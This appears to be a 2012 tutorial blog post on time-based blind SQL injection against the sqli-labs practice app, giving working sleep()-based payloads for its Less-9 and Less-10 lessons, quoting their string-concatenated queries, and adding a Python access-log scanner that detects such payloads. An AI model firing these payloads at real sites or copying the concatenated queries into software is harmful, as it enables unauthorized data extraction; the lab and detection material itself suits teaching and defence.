Sunday, June 24, 2012


CAUTION: This is for educational purposes only. Please do not use the skills you gain from following the video lessons or the blog to harm or test sites on the internet for which you do not have permission. Doing so is illegal. I do not support these sorts of activities and would advise you all to stay away from them... If you do so you are solely responsible for your actions; you have been warned.


In the previous post, we discussed the basics of blind injections and started to explore Boolean-based blind injections. In this post we continue with blind injections and discuss TIME-based injections.
Some vulnerable web applications do not disclose errors, do not display any database fields on the page, and do not react visibly to Boolean yes/no queries, so we cannot tell a true condition from a false one by looking at the response. In that case we can use time to distinguish between true and false. This is done with the sleep() function: it is not CPU intensive, and if the condition is true the query waits for the given number of seconds before returning, while a false condition returns immediately. This difference in page load time lets us recover the correct characters one by one.
Another way to do time-based injection is with heavy queries (benchmark queries), which are CPU intensive and burn CPU cycles when the condition is true but return quickly when it is false. It is always better to use the sleep() function.

Less-9, line number 29
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'+and+sleep(10)+--+                  -- Basic injection to detect sqli
1'+and+if(1=1, sleep(10), null)+--+   -- Returns True  (page load is approx 10 sec)
1'+and+if(1=0, sleep(10), null)+--+   -- Returns False (page load is almost instant)
(In the URL, "+" is decoded to a space, so "--+" becomes "-- ", the MySQL comment sequence that discards the rest of the query.)

Less-10, line numbers 28, 29
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"+and+sleep(10)+--+                  -- Basic injection to detect sqli
1"+and+if(1=1, sleep(10), null)+--+   -- Returns True  (page load is approx 10 sec)
1"+and+if(1=0, sleep(10), null)+--+   -- Returns False (page load is almost instant)
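As an added example (my own code, not part of the original post or of sqli-labs), here is the defender's view of the technique above: a small Python scanner that reads web-server access log lines, URL-decodes each query parameter the way PHP does, and flags the sleep()/benchmark() delay functions and the if() wrapper, together with any response that took suspiciously long. The log lines and the trailing response-time field (modelled on nginx's $request_time) are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (not real traffic) in combined log format with the
# response time in seconds appended, as nginx's $request_time would give.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jun/2012:10:15:01 +0000] "GET /Less-9/?id=1'+and+sleep(10)+--+ HTTP/1.1" 200 734 10.004
203.0.113.5 - - [24/Jun/2012:10:15:12 +0000] "GET /Less-9/?id=1'+and+if(1%3D0,+sleep(10),+null)+--+ HTTP/1.1" 200 734 0.003
198.51.100.7 - - [24/Jun/2012:10:15:13 +0000] "GET /Less-9/?id=1 HTTP/1.1" 200 734 0.002
203.0.113.5 - - [24/Jun/2012:10:15:20 +0000] "GET /Less-10/?id=1%22+and+if(1%3D1,+sleep(10),+null)+--+ HTTP/1.1" 200 734 10.002
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<rt>[\d.]+)$'
)
# MySQL delay primitives from the post: sleep(), the CPU-heavy benchmark()
# alternative, and the if() wrapper that turns either into a true/false oracle.
DELAY_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)
COND_RE = re.compile(r'\bif\s*\(', re.IGNORECASE)


def scan_line(line, slow_threshold=5.0):
    """Return a finding dict for one log line, or None if nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qsl URL-decodes values, so "+and+sleep(10)+--+" becomes " and sleep(10) -- "
    params = parse_qsl(urlsplit(m.group("url")).query, keep_blank_values=True)
    reasons = []
    for name, value in params:
        if DELAY_RE.search(value):
            kind = "conditional delay" if COND_RE.search(value) else "delay function"
            reasons.append(f"{kind} in parameter {name!r}: {value.strip()}")
    rt = float(m.group("rt"))
    slow = rt >= slow_threshold
    if slow:
        reasons.append(f"response took {rt:.1f}s")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "url": m.group("url"), "rt": rt, "slow": slow, "reasons": reasons}


def scan_log(text, slow_threshold=5.0):
    """Scan a whole log. A slow response with no recognised payload is still
    reported, so encodings the regexes miss do not pass unnoticed."""
    findings = [scan_line(l, slow_threshold) for l in text.splitlines() if l.strip()]
    return [f for f in findings if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["rt"], "; ".join(f["reasons"]))
```

The fast second line is the false branch of the same probe, which is why the payload pattern, not only the latency, has to be matched.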

Hope this makes some sense, after all I am a dhakkan.
